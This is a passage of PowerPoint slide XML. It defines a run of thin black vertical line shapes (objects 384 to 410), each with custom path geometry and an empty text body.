        <p:nvSpPr>
          <p:cNvPr id="384" name="object 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916702" y="5293601"/>
            <a:ext cx="1258" cy="397638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="200660">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="200145"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="object 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5945675" y="5359333"/>
            <a:ext cx="0" cy="330946"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="167005">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="166974"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="object 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5945401" y="5358239"/>
            <a:ext cx="2517" cy="332204"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="167639">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="167526"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="object 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973580" y="5348104"/>
            <a:ext cx="0" cy="342271"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172719">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="172635"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="object 388"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5971377" y="5347226"/>
            <a:ext cx="2517" cy="343529"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="173355">
                <a:moveTo>
                  <a:pt x="0" y="172808"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="173084"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="object 389"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6001434" y="5396871"/>
            <a:ext cx="0" cy="294454"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="148589">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="148031"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="object 390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6001162" y="5398500"/>
            <a:ext cx="1258" cy="291937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="147319">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="147209"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="object 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6028793" y="5377051"/>
            <a:ext cx="0" cy="313329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="158114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158028"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="object 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025796" y="5377856"/>
            <a:ext cx="3775" cy="313329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="158114">
                <a:moveTo>
                  <a:pt x="0" y="157351"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="157351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="157627"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="object 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6056699" y="5420499"/>
            <a:ext cx="0" cy="270545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="136525">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="136103"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="object 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055880" y="5421001"/>
            <a:ext cx="1258" cy="269287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="135889">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="135854"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="object 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084551" y="5402234"/>
            <a:ext cx="0" cy="288162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="145414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="145325"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="object 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084277" y="5401140"/>
            <a:ext cx="2517" cy="289420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="146050">
                <a:moveTo>
                  <a:pt x="828" y="145601"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="145601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="145877"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="object 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6112458" y="5432274"/>
            <a:ext cx="0" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="130175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="130166"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="object 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6110544" y="5432274"/>
            <a:ext cx="2517" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="130175">
                <a:moveTo>
                  <a:pt x="0" y="129890"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="130166"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="object 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140311" y="5426364"/>
            <a:ext cx="0" cy="264253"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="133350">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="133148"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="object 400"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140038" y="5429378"/>
            <a:ext cx="1258" cy="261737"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="132080">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="131627"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="object 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6168216" y="5434408"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129089"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="object 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167944" y="5433315"/>
            <a:ext cx="3775" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="130175">
                <a:moveTo>
                  <a:pt x="1374" y="129365"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="129365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="129641"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="object 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6196122" y="5437637"/>
            <a:ext cx="0" cy="252928"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="127635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="127460"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="object 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6195303" y="5440360"/>
            <a:ext cx="1258" cy="250409"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="126364">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="126085"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="object 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223976" y="5432821"/>
            <a:ext cx="0" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="130175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129890"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="object 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223702" y="5432522"/>
            <a:ext cx="2517" cy="257961"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="130175">
                <a:moveTo>
                  <a:pt x="828" y="129766"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="129766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130042"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="object 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251882" y="5442999"/>
            <a:ext cx="0" cy="247895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="125094">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="124754"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="object 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6249967" y="5442999"/>
            <a:ext cx="2517" cy="247895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="125094">
                <a:moveTo>
                  <a:pt x="0" y="124478"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="124754"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="object 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279734" y="5415640"/>
            <a:ext cx="0" cy="275578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="139064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="138560"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="object 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279461" y="5418653"/>
            <a:ext cx="1258" cy="271803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="137160">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="137039"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
